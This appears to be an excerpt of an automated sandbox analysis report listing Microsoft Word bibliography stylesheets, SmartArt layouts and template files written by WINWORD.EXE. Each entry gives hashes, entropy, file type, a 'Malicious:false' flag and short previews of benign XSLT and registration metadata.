                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):332
                                                                                                                                                        Entropy (8bit):3.547857457374301
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                                        SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                                        SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                                        SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                                        Malicious:false
Preview:[File] | OriginalName: harvardanglia2008officeonline.xsl | Component: WordFiles | ReqVer: 14 | Executable: {WD} | StoreLocation: {My Templates} | Command: /f {FilePath}
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284415
                                                                                                                                                        Entropy (8bit):5.00549404077789
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                        MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):302
                                                                                                                                                        Entropy (8bit):3.537169234443227
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                                        SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                                        SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                                        SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):217137
                                                                                                                                                        Entropy (8bit):5.068335381017074
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5081874837369886
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):255948
                                                                                                                                                        Entropy (8bit):5.103631650117028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                        MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):256
                                                                                                                                                        Entropy (8bit):3.464918006641019
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                        SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                        SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                        SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):51826
                                                                                                                                                        Entropy (8bit):5.541375256745271
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4845992218379616
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                        MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                        SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                        SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                        SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6024
                                                                                                                                                        Entropy (8bit):7.886254023824049
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):242
                                                                                                                                                        Entropy (8bit):3.4938093034530917
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                        MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                        SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                        SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                        SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4888
                                                                                                                                                        Entropy (8bit):7.8636569313247335
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):262
                                                                                                                                                        Entropy (8bit):3.4901887319218092
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                                        SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                                        SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                                        SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File]; OriginalName: RadialPictureList.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5596
                                                                                                                                                        Entropy (8bit):7.875182123405584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                        MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4026
                                                                                                                                                        Entropy (8bit):7.809492693601857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250
                                                                                                                                                        Entropy (8bit):3.4916022431157345
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                        SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                        SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                        SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[File]; OriginalName: BracketList.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):288
                                                                                                                                                        Entropy (8bit):3.523917709458511
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):296658
                                                                                                                                                        Entropy (8bit):5.000002997029767
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):292
                                                                                                                                                        Entropy (8bit):3.5026803317779778
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):251032
                                                                                                                                                        Entropy (8bit):5.102652100491927
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                        Malicious:false
